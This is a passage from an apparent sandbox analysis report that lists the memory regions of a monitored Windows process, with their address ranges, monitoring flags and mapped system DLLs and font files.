region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 377
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 378
start_va = 0x7fe60000
end_va = 0x7feaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fe60000"
filename = ""
Region:
id = 379
start_va = 0x7fe50000
end_va = 0x7fe5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fe50000"
filename = ""
Region:
id = 380
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 381
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 382
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 383
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 384
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 385
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 386
start_va = 0x4df0000
end_va = 0x4dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004df0000"
filename = ""
Region:
id = 387
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 388
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 389
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 390
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 391
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 392
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 393
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 394
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 395
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 396
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 397
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 398
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 399
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 400
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 401
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 402
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 403
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 404
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 405
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 406
start_va = 0x4e00000
end_va = 0x4e0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e00000"
filename = ""
Region:
id = 407
start_va = 0x4e10000
end_va = 0x4e1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e10000"
filename = ""
Region:
id = 408
start_va = 0x4e20000
end_va = 0x4e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e20000"
filename = ""
Region:
id = 409
start_va = 0x6f880000
end_va = 0x6f89cfff
monitored = 0
entry_point = 0x6f883b10
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")
Region:
id = 410
start_va = 0x60000000
end_va = 0x60007fff
monitored = 0
entry_point = 0x60003fae
region_type = mapped_file
name = "accessibility.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Accessibility\\2.0.0.0__b03f5f7f11d50a3a\\Accessibility.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\accessibility\\2.0.0.0__b03f5f7f11d50a3a\\accessibility.dll")
Region:
id = 411
start_va = 0x4d00000
end_va = 0x4d07fff
monitored = 0
entry_point = 0x4d03fae
region_type = mapped_file
name = "accessibility.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Accessibility\\2.0.0.0__b03f5f7f11d50a3a\\Accessibility.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\accessibility\\2.0.0.0__b03f5f7f11d50a3a\\accessibility.dll")
Region:
id = 412
start_va = 0x60000000
end_va = 0x60007fff
monitored = 0
entry_point = 0x60003fae
region_type = mapped_file
name = "accessibility.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Accessibility\\2.0.0.0__b03f5f7f11d50a3a\\Accessibility.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\accessibility\\2.0.0.0__b03f5f7f11d50a3a\\accessibility.dll")
Region:
id = 413
start_va = 0x4e00000
end_va = 0x4e0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e00000"
filename = ""
Region:
id = 414
start_va = 0x4e00000
end_va = 0x4e0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e00000"
filename = ""
Region:
id = 415
start_va = 0x4e00000
end_va = 0x4e0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e00000"
filename = ""
Region:
id = 416
start_va = 0x4e10000
end_va = 0x4e1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e10000"
filename = ""
Region:
id = 417
start_va = 0x4e30000
end_va = 0x4e3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e30000"
filename = ""
Region:
id = 418
start_va = 0x4e40000
end_va = 0x4e4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e40000"
filename = ""
Region:
id = 419
start_va = 0x4e10000
end_va = 0x4e1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e10000"
filename = ""
Region:
id = 420
start_va = 0x743f0000
end_va = 0x74481fff
monitored = 0
entry_point = 0x74428cf0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 421
start_va = 0x4e30000
end_va = 0x4e6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e30000"
filename = ""
Region:
id = 422
start_va = 0x4e70000
end_va = 0x4f6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e70000"
filename = ""
Region:
id = 423
start_va = 0x4f70000
end_va = 0x4faffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004f70000"
filename = ""
Region:
id = 424
start_va = 0x4fb0000
end_va = 0x50affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004fb0000"
filename = ""
Region:
id = 425
start_va = 0x50b0000
end_va = 0x50effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000050b0000"
filename = ""
Region:
id = 426
start_va = 0x50f0000
end_va = 0x51effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000050f0000"
filename = ""
Region:
id = 427
start_va = 0x4e10000
end_va = 0x4e1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e10000"
filename = ""
Region:
id = 428
start_va = 0x51f0000
end_va = 0x526ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000051f0000"
filename = ""
Region:
id = 429
start_va = 0x6aa20000
end_va = 0x6ab8afff
monitored = 0
entry_point = 0x6aa8e360
region_type = mapped_file
name = "gdiplus.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll")
Region:
id = 430
start_va = 0x5270000
end_va = 0x546ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005270000"
filename = ""
Region:
id = 431
start_va = 0x5270000
end_va = 0x52affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005270000"
filename = ""
Region:
id = 432
start_va = 0x52b0000
end_va = 0x53affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000052b0000"
filename = ""
Region:
id = 433
start_va = 0x5460000
end_va = 0x546ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005460000"
filename = ""
Region:
id = 434
start_va = 0x74120000
end_va = 0x7423efff
monitored = 0
entry_point = 0x74165980
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 435
start_va = 0x6cec0000
end_va = 0x6d0b0fff
monitored = 0
entry_point = 0x6cfa3cd0
region_type = mapped_file
name = "dwrite.dll"
filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll")
Region:
id = 436
start_va = 0x53b0000
end_va = 0x53f8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "~fontcache-system.dat"
filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat")
Region:
id = 437
start_va = 0x5400000
end_va = 0x5403fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005400000"
filename = ""
Region:
id = 438
start_va = 0x5470000
end_va = 0x646ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "~fontcache-fontface.dat"
filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat")
Region:
id = 439
start_va = 0x5410000
end_va = 0x5413fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005410000"
filename = ""
Region:
id = 440
start_va = 0x6470000
end_va = 0x656ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006470000"
filename = ""
Region:
id = 441
start_va = 0x6570000
end_va = 0x666ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006570000"
filename = ""
Region:
id = 442
start_va = 0x6670000
end_va = 0x672cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "micross.ttf"
filename = "\\Windows\\Fonts\\micross.ttf" (normalized: "c:\\windows\\fonts\\micross.ttf")
Region:
id = 443
start_va = 0x6730000
end_va = 0x6b2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006730000"
filename = ""
Region:
id = 444
start_va = 0x5420000
end_va = 0x542ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005420000"
filename = ""
Region:
id = 445
start_va = 0x5420000
end_va = 0x542ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005420000"
filename = ""
Region:
id = 446
start_va = 0x5420000
end_va = 0x542ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005420000"
filename = ""
Region:
id = 447
start_va = 0x5420000
end_va = 0x542ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005420000"
filename = ""
Region:
id = 448
start_va = 0x5420000
end_va = 0x542ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005420000"
filename = ""
Region:
id = 449
start_va = 0x5430000
end_va = 0x543ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005430000"
filename = ""
Region:
id = 450
start_va = 0x6b30000
end_va = 0x7021fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006b30000"
filename = ""
Region:
id = 451
start_va = 0x5440000
end_va = 0x544ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005440000"
filename = ""
Region:
id = 452
start_va = 0x5440000
end_va = 0x544ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005440000"
filename = ""
Region:
id = 453
start_va = 0x5440000
end_va = 0x544ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005440000"
filename = ""
Region:
id = 454
start_va = 0x5440000
end_va = 0x544ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005440000"
filename = ""
Region:
id = 455
start_va = 0x5440000
end_va = 0x544ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005440000"
filename = ""
Region:
id = 456
start_va = 0x6a740000
end_va = 0x6aa1cfff
monitored = 0
entry_point = 0x6a9f5c24
region_type = mapped_file
name = "system.data.dll"
filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll")
Region:
id = 457
start_va = 0x5440000
end_va = 0x545ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005440000"
filename = ""
Region:
id = 458
start_va = 0x7030000
end_va = 0x730cfff
monitored = 0
entry_point = 0x72e5c24
region_type = mapped_file
name = "system.data.dll"
filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll")
Region:
id = 459
start_va = 0x6a740000
end_va = 0x6aa1cfff
monitored = 0
entry_point = 0x6a9f5c24
region_type = mapped_file
name = "system.data.dll"
filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll")
Region:
id = 460
start_va = 0x7310000
end_va = 0x7310fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000007310000"
filename = ""
Region:
id = 461
start_va = 0x75e90000
end_va = 0x75eeefff
monitored = 0
entry_point = 0x75e94af0
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")
Region:
id = 462
start_va = 0x76160000
end_va = 0x762d7fff
monitored = 0
entry_point = 0x761b8a90
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")
Region:
id = 463
start_va = 0x76c10000
end_va = 0x76c1dfff
monitored = 0
entry_point = 0x76c15410
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")
Region:
id = 464
start_va = 0x7320000
end_va = 0x75f5fff
monitored = 0
entry_point = 0x75d5c24
region_type = mapped_file
name = "system.data.dll"
filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll")
Region:
id = 465
start_va = 0x7320000
end_va = 0x732ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007320000"
filename = ""
Region:
id = 466
start_va = 0x7330000
end_va = 0x733ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007330000"
filename = ""
Region:
id = 467
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 468
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 469
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 470
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 471
start_va = 0x7350000
end_va = 0x735ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007350000"
filename = ""
Region:
id = 472
start_va = 0x7350000
end_va = 0x735ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007350000"
filename = ""
Region:
id = 473
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 474
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 475
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 476
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 477
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 478
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 479
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 480
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 481
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 482
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 483
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 484
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 485
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 486
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 487
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 488
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 489
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 490
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 491
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 492
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 493
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 494
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 495
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 496
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 497
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 498
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 499
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 500
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 501
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 502
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 503
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 504
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 505
start_va = 0x7350000
end_va = 0x735ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007350000"
filename = ""
Region:
id = 506
start_va = 0x7350000
end_va = 0x735ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007350000"
filename = ""
Region:
id = 507
start_va = 0x7350000
end_va = 0x735ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007350000"
filename = ""
Region:
id = 508
start_va = 0x7360000
end_va = 0x736ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007360000"
filename = ""
Region:
id = 509
start_va = 0x7360000
end_va = 0x736ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007360000"
filename = ""
Region:
id = 510
start_va = 0x7360000
end_va = 0x736ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007360000"
filename = ""
Region:
id = 511
start_va = 0x7350000
end_va = 0x7354fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sorttbls.nlp"
filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp")
Region:
id = 512
start_va = 0x7360000
end_va = 0x73a0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortkey.nlp"
filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp")
Region:
id = 513
start_va = 0x73b0000
end_va = 0x73bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000073b0000"
filename = ""
Region:
id = 514
start_va = 0x73b0000
end_va = 0x73bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000073b0000"
filename = ""
Region:
id = 515
start_va = 0x73b0000
end_va = 0x73bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000073b0000"
filename = ""
Region:
id = 516
start_va = 0x73b0000
end_va = 0x73bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000073b0000"
filename = ""
Region:
id = 517
start_va = 0x73b0000
end_va = 0x73bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000073b0000"
filename = ""
Region:
id = 518
start_va = 0x73b0000
end_va = 0x73bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000073b0000"
filename = ""
Region:
id = 519
start_va = 0x73b0000
end_va = 0x73bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000073b0000"
filename = ""
Region:
id = 520
start_va = 0x73b0000
end_va = 0x73bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000073b0000"
filename = ""
Region:
id = 521
start_va = 0x73b0000
end_va = 0x73bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000073b0000"
filename = ""
Region:
id = 522
start_va = 0x73b0000
end_va = 0x73cffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000073b0000"
filename = ""
Region:
id = 523
start_va = 0x64890000
end_va = 0x648fbfff
monitored = 0
entry_point = 0x648ecd0e
region_type = mapped_file
name = "system.configuration.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Configuration\\2.0.0.0__b03f5f7f11d50a3a\\System.configuration.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.configuration\\2.0.0.0__b03f5f7f11d50a3a\\system.configuration.dll")
Region:
id = 524
start_va = 0x73d0000
end_va = 0x743bfff
monitored = 0
entry_point = 0x742cd0e
region_type = mapped_file
name = "system.configuration.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Configuration\\2.0.0.0__b03f5f7f11d50a3a\\System.configuration.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.configuration\\2.0.0.0__b03f5f7f11d50a3a\\system.configuration.dll")
Region:
id = 525
start_va = 0x7440000
end_va = 0x744ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007440000"
filename = ""
Region:
id = 526
start_va = 0x64890000
end_va = 0x648fbfff
monitored = 0
entry_point = 0x648ecd0e
region_type = mapped_file
name = "system.configuration.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Configuration\\2.0.0.0__b03f5f7f11d50a3a\\System.configuration.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.configuration\\2.0.0.0__b03f5f7f11d50a3a\\system.configuration.dll")
Region:
id = 527
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 528
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 529
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 530
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 531
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 532
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 533
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 534
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 535
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 536
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 537
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 538
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 539
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 540
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
